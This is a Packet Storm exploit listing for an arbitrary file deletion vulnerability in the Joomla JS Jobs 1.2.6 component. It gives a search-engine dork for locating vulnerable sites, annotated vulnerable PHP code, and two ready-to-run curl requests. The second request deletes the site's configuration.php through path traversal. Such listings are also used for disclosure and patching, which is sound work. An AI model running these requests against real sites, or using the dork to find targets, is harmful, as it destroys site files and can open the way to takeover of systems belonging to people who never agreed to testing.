exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla JS Jobs 1.2.6 Arbitrary File Delete

Joomla JS Jobs 1.2.6 Arbitrary File Delete
Posted Aug 16, 2019
Authored by qw3rTyTy

Joomla JS Jobs component version 1.2.6 suffers from an arbitrary file deletion vulnerability.

tags | exploit, arbitrary
SHA-256 | e22b92e40a6dcae97a4318f154e348f0f591f8be896864fc454d6b598c98bda9

Joomla JS Jobs 1.2.6 Arbitrary File Delete

Change Mirror Download
# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
# Dork: inurl:"index.php?option=com_jsjobs"
# Date: 2019-08-16
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.joomsky.com/
# Software Link: https://www.joomsky.com/5/download/1
# Version: 1.2.6
# Tested on: Debian/nginx/joomla 3.9.0

# Vulnerability details:
# This vulnerability is caused when processing custom userfield.

File: site/models/job.php
Function: storeJob
Line: 1240
-------------------------------------

1215 //custom field code start
1216 $customflagforadd = false;
1217 $customflagfordelete = false;
1218 $custom_field_namesforadd = array();
1219 $custom_field_namesfordelete = array();
1220 $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);
1221 $params = array();
1222 $forfordelete = '';
1223
1224 foreach ($userfield AS $ufobj) {
1225 $vardata = '';
1226 if($ufobj->userfieldtype == 'file'){
1227 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){
1228 $vardata = $data[$ufobj->field.'_2'];
1229 }else{
1230 $vardata = $_FILES[$ufobj->field]['name'];
1231 }
1232 $customflagforadd=true;
1233 $custom_field_namesforadd[]=$ufobj->field;
1234 }else{
1235 $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : '';
1236 }
1237 if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){
1238 $customflagfordelete = true;
1239 $forfordelete = $ufobj->field;
1240 $custom_field_namesfordelete[]= $data[$ufobj->field.'_2']; //No check.
1241 }
...snip...
1323 // new
1324 //removing custom field
1325 if($customflagfordelete == true){
1326 foreach ($custom_field_namesfordelete as $key) {
1327 $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2); //!!!
1328 }
1329 }

File: site/models/common.php
Function: uploadOrDeleteFileCustom
Line: 851
-------------------------------------

748 $path = $base . '/' . $datadirectory;
749 if (!file_exists($path)) { // create user directory
750 $this->makeDir($path);
751 }
752 $isupload = false;
753 $path = $path . '/data';
754 if (!file_exists($path)) { // create user directory
755 $this->makeDir($path);
756 }
757 if($for == 3 )
758 $path = $path . '/jobseeker';
759 else
760 $path = $path . '/employer';
761
762 if (!file_exists($path)) { // create user directory
763 $this->makeDir($path);
764 }
...snip...
843 } else { // DELETE FILES
844 if ($isdeletefile == 1) {
845 if($for == 3){
846 $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';
847 }else{
848 $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/';
849 }
850 $file = $userpath.$field;
851 unlink($file); //!!!
852 }
853 return 1;
854 }
855 }

#####################################
#PoC:
#####################################

# If an administrator has added custom userfield 'ufield926' as field type 'file', attacker are can trigger this vulnerability by send a following requests.

$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926=@./valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"

$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' "http://localhost/index.php"
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close